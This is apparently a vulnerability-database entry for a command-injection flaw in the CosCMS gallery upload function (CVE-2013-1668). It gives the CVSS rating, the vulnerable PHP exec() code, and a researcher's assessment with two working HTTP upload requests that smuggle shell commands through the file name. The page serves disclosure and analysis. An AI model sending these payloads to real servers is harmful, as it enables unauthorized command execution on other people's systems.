8.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:S/C:C/I:C/A:C
The uploadFile function in upload/index.php in CosCMS before 1.822 allows remote administrators to execute arbitrary commands via shell metacharacters in the name of an uploaded file.
Recent assessments:
wchen-r7 at September 12, 2019 6:08pm UTC reported:
In fact, doesnโt seem like the user should be authenticated at all. Looking at this request:
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970
-----------------------------21456260222104
Content-Disposition: form-data; name=โtitleโ
1
-----------------------------21456260222104
Content-Disposition: form-data; name=โimage_addโ
1
-----------------------------21456260222104
Content-Disposition: form-data; name=โdescriptionโ
1
-----------------------------21456260222104
Content-Disposition: form-data; name=โtagsโ
-----------------------------21456260222104
Content-Disposition: form-data; name=โMAX_FILE_SIZEโ
100000000
-----------------------------21456260222104
Content-Disposition: form-data; name=โAPC_UPLOAD_PROGRESSโ
511ad0922b50f
-----------------------------21456260222104
Content-Di sposition: form-data; name=โfileโ; filename=โ1 & ls -la > file.txtโ
Content-Type: application/octet-stream
1
-----------------------------21456260222104
Content-Disposition: form-data; name=โsubmitโ
Update
-----------------------------21456260222104โ
According to my testing, really authentication isnโt needed to reach the vulnerable code.
Vulnerability: The vulnerable resides on modules/gallery/upload/index.php, in the uploadFile() function, where
$exec is called with partially user controlled data:
$command = โmv " . $_FILES[โfileโ][โtmp_nameโ] . " $zipโ;
//die;
exec ($command, $output = array (), $res);
$command = "chmod 777 " . $zip;
exec ($command, $output = array (), $res);
$command = "unzip -o -UU " . $zip;
exec ($command, $output = array (), $res);
The $zip variable can be partially controlled:
$zip = "/tmp/" . $_FILES['file']['name'];
Since $_FILES[โfileโ][โnameโ] is used for injection โ/โ is a badchar, which makes exploitation (of something usefull) really difficult:
Execution is with www-data privileges by default, not a lot of things to do.
You are executing from modules/gallery/upload where by default, and in the recommended installation user hasnโt privileges for writting. So
the provided PoC by htbridge doesnโt work at all in a default installation:
Content-Di sposition: form-data; name=โfileโ; filename=โ1 & ls -la > file.txtโ
You cannot write file.txt in modules/gallery/upload by default.
My PoC:
POST /gallery/upload/index HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/gallery/view/1
Content-Type: multipart/form-data; boundary=---------------------------1107861128371857341391966473
Content-Length: 360
-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="file"; filename="ls; <COMMAND>"
Content-Type: text/plain
msf.txt
-----------------------------1107861128371857341391966473
Content-Disposition: form-data; name="submit"
Upload File
-----------------------------1107861128371857341391966473--
Assessed Attacker Value: 0
Assessed Attacker Value: 0Assessed Attacker Value: 0
archives.neohapsis.com/archives/bugtraq/2013-03/0033.html
osvdb.org/90927
www.coscms.org/blog/view/4/Version-1.822
www.exploit-db.com/exploits/24629
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1668
github.com/diversen/gallery/commit/7d58f870e8edc6597485dd1b80ea9fb78580190c
www.htbridge.com/advisory/HTB23145